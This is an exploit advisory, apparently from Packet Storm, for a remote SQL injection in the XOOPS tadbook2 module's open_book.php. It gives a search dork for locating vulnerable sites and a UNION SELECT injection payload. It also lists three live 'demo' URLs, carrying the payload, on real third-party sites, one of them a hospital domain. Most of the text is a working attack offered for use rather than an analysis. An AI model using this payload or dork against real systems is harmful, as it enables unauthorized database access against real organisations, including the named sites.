The XOOPS module tadbook2 suffers from a remote SQL injection vulnerability in open_book.php.
9967c86b03205854750b458772b337f5d3e15ece7b8cbb5a5364f01e22df690e##########################################
#
# XOOPS Module: tadbook2
#
#
##########################################
#
##AUTHOR : Stylextra
#
####HOME : http://www.zamet.org
#
####MAIL : Slawi-team@hotmail.fr
#
###########################################
#
# DORKS : dork: /modules/tadbook2/open_book.php?book_sn=
###########################################
target: scriptpage.com/modules/tadbook2/open_book.php?book_sn=[sql Code]
Sql code: -99/**/union/**/select/**/version(),2/*
live link: http://xxx.com/modules/tadbook2/open_book.php?book_sn=-99/**/union/**/select/**/version(),2/*
demo1 : http://pr.hosp.ncku.edu.tw/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
demo2 : http://www.off.tw/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
demo3 : http://www.taot.org.tw/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed